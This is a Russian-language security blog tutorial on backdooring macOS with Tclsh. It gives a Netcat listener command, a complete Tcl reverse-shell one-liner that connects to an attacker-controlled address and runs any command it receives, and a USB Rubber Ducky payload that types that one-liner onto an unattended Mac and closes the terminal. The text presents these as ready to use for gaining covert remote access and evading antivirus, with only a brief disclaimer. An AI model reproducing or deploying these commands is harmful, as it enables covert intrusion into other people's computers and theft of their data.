✗Как использовать команду Tclsh для обхода антивирусной защиты ✗ — Information Security Squad

✗Как использовать команду Tclsh для обхода антивирусной защиты ✗

Использование Netcat для бэкдора в устройстве macOS имеет свои недостатки.

Если скомпрометированный Mac переходит в спящий режим, фоновый процесс Netcat будет иногда работать неправильно;

Это приводит к тому, что Netcat работает бесконечно в фоновом режиме, а злоумышленник не имеет никакого нового пути в устройство.

В качестве альтернативы мы будем использовать менее известную оболочку Tcl, которая может обрабатывать внезапные отключения бэкдора.

Что такое Tcl?

Tcl (который обозначает «Command Command Language») — это язык динамического программирования общего назначения с открытым исходным кодом, аналогичный Bourne Shell (sh), C Shell (csh) и Perl.

Поскольку это язык общего назначения, его можно использовать со многими вещами, такими как сетевые, административные и настольные приложения.

Tcl является зрелым, кросс-платформенным, легко развертываемым и высоко расширяемым, согласно его сайту.

Tclsh — это оболочечное приложение, которое считывает команды Tcl.

Подобно Python или Bash, если Tclsh запущен без аргументов в терминале, он открывается в интерактивном режиме и ожидает от пользователя дополнительных команд.

Скрипты Tcl также могут быть созданы с использованием расширений .tclshrc и .tcl.

Почему Бэкдоры Tcl лучше, чем Python / Bash ?

Как уже упоминалось, создание резервных копий Netcat может быть установлено с минимальными символами, что делает его идеальным методом для быстрого получения удаленного доступа к настольному компьютеру или ноутбуку Mac.

Однако, если MacBook или другое устройство MacOS внезапно переходит в спящий режим, блокируется выволнение сеанса или соединение Wi-Fi теряется, когда злоумышленник выпускает удаленные команды, процесс Netcat может замерзнуть и не завершиться;

Это в конечном итоге оставляет злоумышленника без нового пути осуществления удаленного доступа к устройству.

К счастью, Tclsh изящно устраняет внезапные отключения и уже присутствует во всех устройствах macOS.

Если вы пользователь macOS, вы можете проверить это, открыв терминал и набрав tclsh.

Вы увидите, что ls и ifconfig функционируют должным образом.

Шаг 1 Запустите прослушиватель Netcat

Чтобы начать использовать Tclsh в качестве механизма бэкдора, откройте терминал в Kali (или любой операционной системе на базе Unix с установленной Netcat) и введите следующую команду, чтобы запустить прослушиватель Netcat.

 nc -l -p 9999 

Netcat откроет прослушивающий (-l) порт на каждом доступном интерфейсе.

Если вы работаете в локальной сети, слушатель Netcat будет доступен на вашем локальном адресе (например, 192.168.0.X).

Если слушатель запускается на виртуальном частном сервере (VPS), обязательно используйте свой IP-адрес VPS в будущих командах Tclsh.

Номер порта (-p) (9999) является произвольным и может быть изменен на любое число меньше 65535.

Шаг 2 Выполните команду Tclsh

Наконец, запустите команду ниже на любом устройстве macOS, чтобы установить удаленное соединение.

Не забудьте изменить адрес 1.2.3.4 на локальный адрес злоумышленника или адрес VPS.

echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &

Эта команда создаст ряд переменных и в конечном итоге установит соединение между устройством macOS и системой злоумышленника с использованием Tclsh.

Установленная оболочка будет функционировать должным образом, как и любая оболочка, которую вы могли использовать в прошлом.

Шаг 3 Rubber Ducky пэйлоад (необязательно)

В будущих статьях я погружусь глубже в методы социальной инженерии, чтобы обманывать пользователей macOS в выполнении наших команд.

На данный момент давайте сосредоточимся на использовании USB Rubber Ducky для выполнения команды, где возможно за несколько секунд замутить физический доступ.

Ниже приведен пример полезной нагрузки.

DELAY 1500
GUI SPACE
DELAY 350
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &
ENTER
GUI q

Этот Ducky Script будет использовать Spotlight для открытия окна терминала и очень быстрого ввода длинной команды Tclsh.

По завершении терминал закроется.

Это может произойти с тобой

Как часто обычный пользователь отходит от своего разблокированного ноутбука?

Чаще, чем можно было бы подумать.

Люди, занимающие властные позиции , особенно часто ошибаются, полагая, что их сотрудники уважают (или боятся) их слишком сильно, чтобы войти в их офис и личное пространство, когда их нет.


Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40